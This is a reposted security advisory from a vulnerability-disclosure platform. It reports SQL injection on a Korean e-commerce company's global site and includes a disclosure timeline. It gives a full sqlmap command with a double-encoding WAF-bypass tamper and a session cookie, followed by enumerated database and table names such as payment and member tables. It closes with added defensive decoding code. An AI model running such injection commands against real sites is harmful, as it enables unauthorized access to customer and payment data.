神刀安全网

Vulnerability title: SQL injection on the global site / main site of Interpark, Korea's largest domestic e-commerce company / 9 databases / large number of tables / double encoding / WAF present / UNION possible

Vulnerability details

Disclosure status:

2016-05-04: Details sent to the vendor; awaiting the vendor's handling
2016-05-06: Vendor has confirmed; details disclosed to the vendor only
2016-05-16: Details disclosed to core white hats and experts in the relevant field
2016-05-26: Details disclosed to ordinary white hats
2016-06-05: Details disclosed to intern white hats
2016-06-20: Details disclosed to the public

Brief description:

I submitted this in the afternoon, but no data came out for a long time. After analyzing the traffic I found that the original traffic was double-encoded; once I applied a tamper script the data came out. I am not familiar with Korean database names, so I did not probe for specific data.

Detailed description:

python sqlmap.py -u "http://**.**.**.**/product/Api.do?_method=getNewOption&callback=jQuery111106387168327488439_1462148731058&PRD_NO=4020676593&OPT_TP=01&OPT_NM1=%25EC%2584%25A0%25ED%2583%259D1&_=1462148731059" --user-agent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" --cookie "wingState=visible; ipzone=HK; city=Central District; CURRENCY=cny; lang=zh_CN; tiemzone=9; _gat=1; IPCODE=003; interparkstamp_global=1308199864190577841264109964981971; LANGUAGE=zh-cn; igfsTodayViewPrdNo=4020676593; igfsTodayViewImg=/goods_image/6/5/9/3/4020676593i.jpg; igfsTodayViewAge=0; JSESSIONID=lQ5uADDlvsvop1Ps44WS73oeA64Aa2wJzaVuUkIhdyMWIr33QJf7GbO15oUWqUfW; _ga=GA1.2.449814888.1462148585" --time-sec=3 --tamper chardoubleencode.py

Proof of vulnerability:

[21:48:42] [DEBUG] performed 0 queries in 0.02 seconds
available databases [9]:
[*] ADM
[*] APEX_030200
[*] CBT
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] XDB

[21:48:42] [INFO] fetching tables for databases: 'ADM, APEX_030200, CBT, CTXSYS, EXFSYS, MDSYS, SYS, SYSTEM, XDB'
[21:48:42] [DEBUG] performed 0 queries in 0.12 seconds
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND                 |
+--------------------------------+

Database: XDB
[2 tables]
+--------------------------------+
| XDB$IMPORT_TT_INFO             |
| XDB$XIDX_IMP_T                 |
+--------------------------------+

Database: APEX_030200
[3 tables]
+--------------------------------+
| WWV_FLOW_DUAL100               |
| WWV_FLOW_LOV_TEMP              |
| WWV_FLOW_TEMP_TABLE            |
+--------------------------------+

Database: SYSTEM
[4 tables]
+--------------------------------+
| HELP                           |
| OL$                            |
| OL$HINTS                       |
| OL$NODES                       |
+--------------------------------+

Database: SYS
[26 tables]
+--------------------------------+
| DUAL                           |
| AUDIT_ACTIONS                  |
| DATA_PUMP_XPL_TABLE$           |
| HS$_PARALLEL_METADATA          |
| HS_BULKLOAD_VIEW_OBJ           |
| HS_PARTITION_COL_NAME          |
| HS_PARTITION_COL_TYPE          |
| IMPDP_STATS                    |
| KU$NOEXP_TAB                   |
| KU$XKTFBUE                     |
| KU$_DATAPUMP_MASTER_10_1       |
| KU$_DATAPUMP_MASTER_11_1       |
| KU$_DATAPUMP_MASTER_11_1_0_7   |
| KU$_DATAPUMP_MASTER_11_2       |
| KU$_LIST_FILTER_TEMP           |
| KU$_LIST_FILTER_TEMP_2         |
| ODCI_PMO_ROWIDS$               |
| ODCI_SECOBJ$                   |
| ODCI_WARNINGS$                 |
| PLAN_TABLE$                    |
| PSTUBTBL                       |
| STMT_AUDIT_OPTION_MAP          |
| SYSTEM_PRIVILEGE_MAP           |
| TABLE_PRIVILEGE_MAP            |
| WRI$_ADV_ASA_RECO_DATA         |
| WRR$_REPLAY_CALL_FILTER        |
+--------------------------------+

Database: MDSYS
[35 tables]
+--------------------------------+
| NTV2_XML_DATA                  |
| OGIS_GEOMETRY_COLUMNS          |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES                 |
| SDO_COORD_AXIS_NAMES           |
| SDO_COORD_OPS                  |
| SDO_COORD_OP_METHODS           |
| SDO_COORD_OP_PARAMS            |
| SDO_FEATURE_USAGE              |
| SDO_PREFERRED_OPS_SYSTEM       |
| SDO_PREFERRED_OPS_USER         |
| SDO_PRIME_MERIDIANS            |
| SDO_PROJECTIONS_OLD_SNAPSHOT   |
| SDO_ST_TOLERANCE               |
| SDO_TOPO_DATA$                 |
| SDO_TOPO_RELATION_DATA         |
| SDO_TOPO_TRANSACT_DATA         |
| SDO_TXN_IDX_DELETES            |
| SDO_TXN_IDX_EXP_UPD_RGN        |
| SDO_TXN_IDX_INSERTS            |
| SDO_UNITS_OF_MEASURE           |
| SDO_XML_SCHEMAS                |
| SRSNAMESPACE_TABLE             |
+--------------------------------+

Database: CBT
[5 tables]
+--------------------------------+
| PLAN_TABLE                     |
| TEMP_CBT                       |
| TMP_GLOBAL_LOGIN_CNT_20150226  |
| TMP_GLOBAL_LOGIN_CNT_20150522  |
| TRACE                          |
+--------------------------------+

Database: ADM
[166 tables]
+--------------------------------+
| BANNER_CONTENT                 |
| BANNER_GROUP_MASTER            |
| BANNER_GROUP_MEMBER            |
| BANNER_ITEM                    |
| BANNER_ITEM_HTML               |
| BEST_USED_WRITTEN              |
| BEST_USED_WRITTEN_ADMIN        |
| BOARD                          |
| BOARD_DTL                      |
| B_WORK1                        |
| B_WORK2                        |
| CARD_PAYMENT                   |
| CARD_PAYMENT_HIS               |
| CART                           |
| CATEGORY_ADDINFO_MGT           |
| CBT_CONTB_PROFIT_CODE          |
| CBT_TRANS_INFO                 |
| CLM_REQUEST                    |
| CLM_REQUESTDTL                 |
| CODE_DETAIL                    |
| CODE_MASTER                    |
| CONTENT_RECOMMEND              |
| CONTENT_REPORT                 |
| COPY_T                         |
| COUNTRY_MAP                    |
| COUPON                         |
| COUPON_CBT_COND                |
| COUPON_CBT_PBLCT               |
| COUPON_EXCEPT_PRD              |
| COUPON_RANDOM                  |
| D2D_PRODUCT_PARCEL_TAX         |
| D2D_WEIGHT_SHIPPING_FEE        |
| DELVWH_ORDER                   |
| DISPLAY_MENU                   |
| ENTR_ANTI_MEMBER               |
| EVENT                          |
| EVENT_FREECODE                 |
| EXCHANGE_RATE                  |
| EX_ORDER_INFO                  |
| FAQ                            |
| FAQ_DTL                        |
| FAVORITE_ENTR                  |
| FREECODE_EVENT                 |
| FREEDELV_EXCEPTION             |
| IGS_MENU                       |
| IGS_MENU_AUTH                  |
| IGS_USER                       |
| IGS_USER_AUTHORITY             |
| IGS_USER_GROUP                 |
| IGS_USER_GROUP_AUTH            |
| ILS_DELVWH_ORDER               |
| ILS_DELVWH_ORDERPRD            |
| ILS_DELV_INVOICE               |
| ILS_ORD_UPDPROC                |
| ILS_RTN_PRD                    |
| INICIS_PAY_INFO                |
| INPAK_DLV_INF                  |
| INQUIRY                        |
| INQUIRY_REPLY                  |
| IPP_MALL_INFO                  |
| IPP_MALL_TRACE                 |
| IPP_VISIT_DDSUM                |
| LANGCODE_TAG                   |
| LANGCODE_TAG2VALUE             |
| LANGCODE_VALUE                 |
| LOG                            |
| LOGIN_SESSION                  |
| MAIL_SEND_HISTORY              |
| MD_ORDERDTL_BUYCONFIRM         |
| MEMBER_GLOBAL                  |
| MEMBER_GLOBAL_TEMP             |
| MENU                           |
| MILEAGE_UNAVAILABLE            |
| ORDERCLM                       |
| ORDERCLMDTL                    |
| ORDERCLMDTL_DISCOUNT           |
| ORDERCLMDTL_ENTR               |
| ORDERCLMDTL_STATUS_HIS         |
| ORDERCLMDTL_STORE              |
| ORDERCLM_ACCESS_INFO           |
| ORDERCLM_CRTTP_PRCS            |
| ORDERCLM_DELV                  |
| ORDERCLM_DELVAMT               |
| ORDERCLM_DELV_COUPON           |
| ORDERCLM_DELV_PLACE            |
| ORDERCLM_DELV_PLACE_BASIC      |
| ORDERCLM_DELV_WEIGHT           |
| ORDERCLM_EOD                   |
| ORDERCLM_EXCEPTION             |
| ORDERCLM_MISS_DELV             |
| ORDERCLM_PRODUCT_HIS           |
| ORDERCLM_STATUS_HIS            |
| ORDER_RELEASE_LIMIT            |
| ORDPAYMENT_REFUND              |
| ORDPAYMENT_REFUND_DTL          |
| RESTAPI_MALL_INFO              |
| RESTAPI_PRODUCT_SET            |
| RESTAPI_WHITE_LIST             |
| REVIEW_SCRAP                   |
| REV_CARD_PAYMENT_DDSUM         |
| REV_DELVAMT_DDSUM              |
| REV_DIFF_HST                   |
| REV_DIFF_RSN                   |
| REV_EXT_DDSUM                  |
| REV_IPOINT_DDSUM               |
| REV_ORDCLMDTL_ORG_SUM          |
| REV_ORDCLMDTL_SUM              |
| REV_ORDCLM_EXPENSE_SUM         |
| REV_ORDPAYMENT_REFUND_SUM      |
| REV_PAY_LOG                    |
| REV_PRCS_HST                   |
| REV_SETL_DELVAMT_LOG           |
| REV_SETL_PRD_LOG_CBT           |
| ROULETTE_ACC_HIS               |
| ROULETTE_RANK                  |
| ROULETTE_RANK_TP               |
| SERVICE_USED_WRITTEN           |
| SERVICE_USED_WRITTEN_DTL       |
| TEMP_PRODUCT_KTY2              |
| TENPAY_PAYMENT                 |
| TENPAY_PAYMENT_AUTH            |
| TENPAY_PAYMENT_HIS             |
| TMP_CLAIM                      |
| TMP_T_IP_CITY                  |
| TMP_T_LOCATION                 |
| TOAD_PLAN_TABLE                |
| TRULY_COMMENT                  |
| TRUNCATE_TAB_LIST              |
| TRY_CBT_TRANS_INFO             |
| TRY_ORD                        |
| TRY_ORDDELV_PLACE              |
| TRY_ORDDTL_DISCOUNT            |
| TRY_ORD_DELVAMT                |
| TRY_ORD_DELV_COUPON            |
| TRY_ORD_DTL                    |
| TRY_PAYMENT                    |
| TTT                            |
| T_IP_CITY                      |
| T_LOCATION                     |
| USED_WRITTEN_ADDINFO           |
| USED_WRITTEN_MEMBER_01         |
| USED_WRITTEN_PRODUCT_01        |
| USED_WRITTEN_REPLY             |
| WORK_CALENDAR                  |
| ZZIM_CNT                       |
| ZZIM_LIST                      |
+--------------------------------+

Database: CTXSYS
[5 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE             |
| DR$OBJECT_ATTRIBUTE            |
| DR$POLICY_TAB                  |
| DR$THS                         |
| DR$THS_PHRASE                  |
+--------------------------------+

Remediation:

Filtering
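The description above attributes the WAF bypass to the request parameters arriving double URL-encoded, and the remediation proposed is filtering; an inspection layer that percent-decodes a parameter once and then matches will not see what a backend that decodes it twice sees. The following is an added example, not code from the report or from the vendor: it models that gap and a layer-by-layer check that closes it, using the OPT_NM1 value from the request quoted above; the %2527 sample, the token list and all function names are constructed for illustration.

```python
from urllib.parse import unquote

# Assumption: cap the decode loop so a hostile value cannot keep it spinning.
MAX_DEPTH = 5

# Constructed, deliberately minimal marker set; a real inspection layer uses
# far richer rules. It only has to show the single- vs multi-decode gap.
SUSPECT_TOKENS = ("'", '"', "--", "/*", ";")


def decode_to_fixed_point(value: str, max_depth: int = MAX_DEPTH) -> tuple:
    """Percent-decode `value` until it stops changing.

    Returns (decoded, depth); depth counts the rounds that changed the string.
    A backend that decodes twice sees exactly what depth == 2 produces.
    """
    current, depth = value, 0
    while depth < max_depth:
        decoded = unquote(current)
        if decoded == current:
            break
        current, depth = decoded, depth + 1
    return current, depth


def single_decode_flags(value: str) -> bool:
    """Model of an inspection layer that decodes exactly once, then matches."""
    return any(tok in unquote(value) for tok in SUSPECT_TOKENS)


def all_layers_flag(value: str) -> bool:
    """Match against the raw value and the output of every decode round, so
    the verdict holds no matter how many times the backend decodes."""
    current, depth = value, 0
    while True:
        if any(tok in current for tok in SUSPECT_TOKENS):
            return True
        decoded = unquote(current)
        if decoded == current or depth >= MAX_DEPTH:
            return False
        current, depth = decoded, depth + 1


# OPT_NM1 as sent in the request quoted in the report: UTF-8 for a Korean
# label, percent-encoded twice, which is this site's normal traffic shape.
OPT_NM1 = "%25EC%2584%25A0%25ED%2583%259D1"
# Constructed sample: a single quote character, percent-encoded twice.
DOUBLE_ENCODED_QUOTE = "%2527"
```

decode_to_fixed_point(OPT_NM1) returns ('선택1', 2); single_decode_flags(DOUBLE_ENCODED_QUOTE) is False while all_layers_flag(DOUBLE_ENCODED_QUOTE) is True, and all_layers_flag(OPT_NM1) stays False. Logging the depth per parameter shows which fields the application legitimately double-decodes, so the inspection layer can be tuned to decode at least as deep as the backend does; parameterized queries remain the fix that any such filter only supplements.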

Copyright notice: please credit the source when reposting: hear7v@WooYun
